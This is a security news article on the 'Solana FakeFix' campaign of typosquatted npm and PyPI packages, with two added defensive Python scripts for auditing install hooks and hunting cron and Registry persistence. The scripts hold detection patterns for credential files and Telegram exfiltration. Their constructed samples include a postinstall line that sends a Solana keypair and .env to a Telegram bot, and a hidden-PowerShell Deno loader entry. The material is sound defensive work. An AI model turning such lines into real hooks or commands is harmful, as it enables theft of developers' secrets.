What Are the Risks of Using Fake Solana Packages?

A coordinated supply chain campaign targeting Solana developers has planted 25 malicious packages across the npm and PyPI package registries, silently harvesting wallet keys, cloud credentials, and other sensitive data from compromised machines. Security firm JFrog disclosed the campaign, dubbed "Solana FakeFix," on Wednesday.

The attack exploited developer trust by disguising malicious libraries as legitimate Solana SDK tooling and build-fix patches. Packages such as @solana-labs/web3-js, @solana-labs/ancor, and @solana-labs/spl-toke used typosquatting and fake branding to lure victims, according to JFrog's findings. A threat actor operating under the handle "PassWord1337" promoted the packages by opening GitHub issues in open-source projects, falsely claiming the libraries resolved common build errors.

How the Attack Works

On the npm side, packages executed malicious JavaScript immediately upon installation through lifecycle hooks, requiring no further action from the developer. The malware configured a Telegram-based command-and-control channel and swept the local system for high-value files, including Solana keypair files (id.json), .env files containing environment variables, and AWS credential stores.

PyPI variants took a slightly different approach, embedding their payload in the package's initialization file so it activated when a developer imported the library during testing or application startup. The Open Source Vulnerabilities database confirmed that affected PyPI packages exfiltrated credentials, SSH keys, and crypto wallet data, and established persistence through cronjobs.

All stolen data was sent in real time to an attacker-controlled Telegram bot, bypassing traditional domain-based detection methods.
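The npm side of the campaign relied on install-time lifecycle hooks, so a useful defensive check is to audit every package manifest in a tree for such hooks and for script text that touches the targets named above. The following script is an added example written for this article, not JFrog's tooling or any Solana project's code; the indicator patterns, the `@example/...` package names and the script bodies are constructed assumptions for illustration.

```python
"""Audit npm package manifests for install-time lifecycle scripts.

Added example for this article; not JFrog's tooling or any Solana project's code.
The FakeFix npm packages ran on install via lifecycle hooks and collected Solana
keypairs, .env files and AWS credential stores, shipping them to a Telegram bot.
This script reports packages that run code on install and any script text that
references those targets. Indicator patterns below are illustrative assumptions,
not published signatures.
"""
import json
import os
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# npm runs these automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

INDICATORS: Dict[str, re.Pattern] = {
    "telegram_api": re.compile(r"api\.telegram\.org", re.I),
    "solana_keypair": re.compile(r"id\.json|\.config/solana", re.I),
    "dotenv_file": re.compile(r"(^|[\s'\"/])\.env\b"),
    "aws_credentials": re.compile(r"\.aws/credentials", re.I),
    "remote_fetch_exec": re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|node)\b", re.I),
}


@dataclass
class Finding:
    name: str
    version: str
    hooks: List[str] = field(default_factory=list)
    indicators: List[str] = field(default_factory=list)


def audit_manifest(manifest: dict) -> Optional[Finding]:
    """Return a Finding if the manifest has install hooks or risky script text."""
    scripts = manifest.get("scripts") or {}
    hooks = [h for h in INSTALL_HOOKS if h in scripts]
    # Scan every script body: a postinstall hook may only call another script.
    text = "\n".join(str(v) for v in scripts.values())
    hits = sorted(k for k, rx in INDICATORS.items() if rx.search(text))
    if not hooks and not hits:
        return None
    return Finding(manifest.get("name", "?"), manifest.get("version", "?"), hooks, hits)


def severity(f: Finding) -> str:
    """An install hook plus an indicator is the FakeFix shape. A hook alone is
    common for native addons and only merits a look; indicators alone are low."""
    if f.hooks and f.indicators:
        return "high"
    return "medium" if f.hooks else "low"


def audit_manifests(manifests: List[dict]) -> List[Finding]:
    return [f for f in (audit_manifest(m) for m in manifests) if f is not None]


def audit_node_modules(root: str) -> List[Finding]:
    """Walk an installed node_modules tree and audit every package.json in it."""
    manifests = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                manifests.append(json.load(fh))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip rather than crash
    return audit_manifests(manifests)


# Constructed sample manifests (placeholder names, not real packages).
SAMPLE_MANIFESTS = [
    {"name": "@example/legit-lib", "version": "1.0.0",
     "scripts": {"test": "jest", "build": "tsc -p ."}},
    {"name": "@example/fake-fix", "version": "0.0.3",
     "scripts": {"postinstall": "node fix.js ~/.config/solana/id.json .env https://api.telegram.org/bot<TOKEN>"}},
    {"name": "@example/native-addon", "version": "2.1.0",
     "scripts": {"install": "node-gyp rebuild"}},
]


if __name__ == "__main__":
    import sys
    found = audit_node_modules(sys.argv[1]) if len(sys.argv) > 1 else audit_manifests(SAMPLE_MANIFESTS)
    for f in found:
        print(f"[{severity(f)}] {f.name}@{f.version} hooks={f.hooks} indicators={f.indicators}")
```

Run it with a path to a project's `node_modules` to audit an installed tree, or with no arguments to see the constructed samples triaged. Because hook-based delivery needs no action beyond `npm install`, disabling lifecycle scripts by default (`npm config set ignore-scripts true`) and re-enabling them per package after review removes the automatic execution path entirely, at the cost of some native addons needing an explicit build step.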

Parallel Campaign Targets Windows Machines

JFrog researchers also identified a secondary campaign running alongside FakeFix. Uploaded by a user called "thermonuclear," CMS-themed npm packages such as cms-storehub functioned as Windows loaders and droppers. These packages used hidden PowerShell scripts to install the Deno JavaScript runtime, which then executed remote code. The obfuscated payload established persistence through Windows Registry keys and communicated with a command-and-control server using JSON Web Tokens.

Remediation Steps

JFrog recommends that affected developers immediately remove all identified packages from developer machines, build workers, and internal caches. Because backdoor commands and registry persistence may already have been executed, the firm urges teams to rebuild CI runners from trusted images and hunt for persistence artifacts, including unauthorized Registry Run keys and rogue startup scripts. Developers should also rotate any Solana wallets, AWS credentials, SSH keys, and other secrets that may have been exposed.
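The hunt for persistence artifacts can be scripted against the plain-text output of the tools teams already have: `crontab -l` for the cron-based persistence of the PyPI variants, and `reg query` on the Run key for the Registry persistence of the Windows loaders. The following script is an added example for this article, not JFrog's guidance verbatim or any vendor tool; its trait patterns, the sample crontab and Registry output, and the `Updater` value name are constructed assumptions, and every flagged entry still needs a human decision.

```python
"""Hunt for persistence artifacts after a package-based compromise.

Added example for this article, not JFrog's guidance verbatim or any vendor tool.
The campaigns described above persisted through cron jobs (PyPI variants) and
Windows Registry Run keys plus a PowerShell-installed Deno runtime (npm loaders).
This script parses the text output of `crontab -l` and of
`reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` and flags
entries with traits a defender would review. Patterns and samples are
constructed assumptions for illustration, not published indicators.
"""
import re
from typing import Dict, List, Tuple

SUSPICIOUS: Dict[str, re.Pattern] = {
    "temp_path": re.compile(r"(/tmp/|/var/tmp/|/dev/shm/|\\AppData\\Local\\Temp\\|%TEMP%)", re.I),
    "hidden_or_encoded_powershell": re.compile(
        r"powershell(\.exe)?\s.*-(w(indowstyle)?\s+hidden|e(nc|ncodedcommand)?\s)", re.I),
    "deno_runtime": re.compile(r"\bdeno(\.exe)?\b", re.I),
    "remote_fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I),
}


def parse_crontab(text: str) -> List[Tuple[str, str]]:
    """Return (name, command) pairs from `crontab -l` output, skipping comments."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # m h dom mon dow command
        if len(fields) < 6:
            continue
        cmd = fields[5]
        # Derive a short name from the executable, e.g. /usr/local/bin/backup.sh -> backup
        name = cmd.split()[0].rsplit("/", 1)[-1].rsplit(".", 1)[0]
        entries.append((name, cmd))
    return entries


def parse_reg_run(text: str) -> List[Tuple[str, str]]:
    """Return (value name, command) pairs from `reg query ...\\Run` output."""
    rx = re.compile(r"^\s+(\S+)\s+REG_(?:EXPAND_)?SZ\s+(.*)$")
    entries = []
    for line in text.splitlines():
        m = rx.match(line)
        if m:
            entries.append((m.group(1), m.group(2).strip()))
    return entries


def hunt(entries: List[Tuple[str, str]], source: str) -> List[Dict]:
    """Flag entries matching any suspicious trait. Entries with no trait are not
    proven clean; a reviewer should still read the full list from each host."""
    findings = []
    for name, cmd in entries:
        traits = sorted(k for k, rx in SUSPICIOUS.items() if rx.search(cmd))
        if traits:
            findings.append({"source": source, "name": name, "command": cmd, "traits": traits})
    return findings


# Constructed sample output (not captured from a real host).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * /tmp/.cache-x/update.sh >/dev/null 2>&1
"""

SAMPLE_REG_RUN = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\dev\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Updater    REG_SZ    powershell.exe -w hidden -c "& $env:LOCALAPPDATA\deno\deno.exe run -A C:\Users\dev\AppData\Local\Temp\loader.js"
"""


def hunt_sample() -> List[Dict]:
    """Run both parsers over the constructed samples."""
    return hunt(parse_crontab(SAMPLE_CRONTAB), "crontab") + hunt(parse_reg_run(SAMPLE_REG_RUN), "HKCU Run")


if __name__ == "__main__":
    for f in hunt_sample():
        print(f"[{f['source']}] {f['name']}: {f['traits']} :: {f['command']}")
```

In practice the two sample strings are replaced by the captured output of `crontab -l` (per user) and `reg query` (per hive and per user), and the script runs from a clean host against the collected text, so it does not depend on tooling installed on the machine under investigation. The rebuild-from-trusted-image and secret-rotation steps still apply regardless of what the hunt finds, since a clean Run key says nothing about backdoor commands that already ran.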

The disclosure adds to an escalating wave of supply chain attacks targeting the cryptocurrency development ecosystem. Weeks earlier, security firm Socket uncovered a separate 34-package campaign called TrapDoor that similarly targeted Solana, Sui, and Aptos developers across npm, PyPI, and Crates.io.